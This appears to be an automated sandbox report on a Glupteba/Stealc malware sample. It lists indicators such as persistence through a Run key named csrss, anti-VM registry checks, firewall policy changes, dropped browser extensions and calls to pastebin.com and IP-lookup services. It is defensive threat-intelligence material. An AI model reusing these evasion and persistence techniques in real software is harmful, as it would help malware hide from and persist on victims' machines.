Malware Analysis Report

2025-08-06 03:33

Sample ID 240419-rdjfssfb5t
Target d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4
SHA256 d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4
Tags
glupteba stealc discovery dropper evasion loader persistence rootkit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4

Threat Level: Known bad

The file d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4 was found to be: Known bad.

Malicious Activity Summary

glupteba stealc discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Modifies firewall policy service

Stealc

Glupteba

Glupteba payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Drops startup file

UPX packed file

Checks BIOS information in registry

Loads dropped DLL

Reads user/profile data of web browsers

Drops Chrome extension

Drops desktop.ini file(s)

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

Enumerates connected drives

Checks installed software on the system

Adds Run key to start application

Checks whether UAC is enabled

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Enumerates system info in registry

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-19 14:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-19 14:04

Reported

2024-04-19 14:07

Platform

win10v2004-20240412-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A

Stealc

stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LJbRIu2pCVXKEFdMDezjIokn.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoV9nPqeelROzDnfhz31XMfB.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hRsEISclko0hAwcIoZnJshZC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DG2z39swRqYzETAkX4aZiJaG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zhc2O9UdJG2ERo97CDUIVDA0.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YorvLNmeO6cy0VDWYWpi1XCP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wViCTUek5N8DiuvPF3ZYQ3ac.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe N/A
N/A N/A C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ulc.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe N/A
N/A N/A C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2156 set thread context of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\ZWZyYuD.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\DUGaRsFaSnqjC\pbtbGil.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\RVqmAwyyxwiU2\pvwAWeNHfwRPL.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
File created C:\Program Files (x86)\ARTXeDTAxvUn\izroyMN.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\QhciBzJOokLnyYZub.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
File created C:\Windows\Tasks\bWycNackLSywaqkmgR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\qbSDwEgyNYPZlGA.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ulc.3.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
